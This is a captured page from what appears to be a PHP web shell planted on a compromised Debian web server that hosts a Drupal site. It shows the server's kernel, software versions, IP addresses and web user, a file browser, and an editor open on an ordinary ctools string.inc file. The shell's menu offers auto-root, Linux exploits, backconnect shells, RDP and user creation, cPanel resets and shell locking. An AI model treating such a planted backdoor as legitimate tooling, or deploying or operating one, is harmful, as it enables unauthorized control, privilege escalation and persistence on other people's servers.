Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.118.184.25
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
ctools /
plugins /
contexts /
[ HOME SHELL ]
Name
Size
Permission
Action
entity.inc
9.04
KB
-rw-r--r--
node.inc
5.21
KB
-rw-r--r--
node_add_form.inc
3.47
KB
-rw-r--r--
node_edit_form.inc
6.04
KB
-rw-r--r--
string.inc
2.36
KB
-rw-r--r--
term.inc
4.78
KB
-rw-r--r--
terms.inc
3.11
KB
-rw-r--r--
token.inc
1.71
KB
-rw-r--r--
user.inc
4.52
KB
-rw-r--r--
user_edit_form.inc
6.02
KB
-rw-r--r--
vocabulary.inc
1.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : string.inc
<?php /** * @file * * Plugin to provide a string context */ /** * Plugins are described by creating a $plugin array which will be used * by the system that includes this file. */ $plugin = array( 'title' => t('String'), 'description' => t('A context that is just a string.'), 'context' => 'ctools_context_create_string', 'edit form' => 'ctools_context_string_settings_form', 'defaults' => '', 'keyword' => 'string', 'no ui' => FALSE, 'context name' => 'string', 'convert list' => array( 'raw' => t('Raw string'), 'html_safe' => t('HTML-safe string'), 'uppercase_words_html_safe' => t('Uppercase words HTML-safe string'), ), 'convert' => 'ctools_context_string_convert', 'placeholder form' => array( '#type' => 'textfield', '#description' => t('Enter the string for this context.'), ), ); /** * It's important to remember that $conf is optional here, because contexts * are not always created from the UI. */ function ctools_context_create_string($empty, $data = NULL, $conf = FALSE) { // The input is expected to be an object as created by ctools_break_phrase // which contains a group of string. $context = new ctools_context('string'); $context->plugin = 'string'; if ($empty) { return $context; } if ($data !== FALSE ) { // Support the array storage from the settings form but also handle direct input from arguments. $context->data = is_array($data) ? $data['string'] : $data; $context->title = ($conf) ? check_plain($data['identifier']) : check_plain($data); return $context; } } /** * Convert a context into a string. */ function ctools_context_string_convert($context, $type) { switch ($type) { case 'raw': return $context->data; case 'html_safe': return check_plain($context->data); case 'uppercase_words_html_safe': return ucwords(str_replace('-', ' ', check_plain($context->data))); } } /** * String settings form. */ function ctools_context_string_settings_form($form, &$form_state) { $conf = &$form_state['conf']; $form['string'] = array( '#title' => t('Enter the string'), '#type' => 'textfield', '#maxlength' => 512, '#weight' => -10, '#default_value' => $conf['string'], ); return $form; } function ctools_context_string_settings_form_submit($form, &$form_state) { $form_state['conf']['string'] = $form_state['values']['string']; }
Close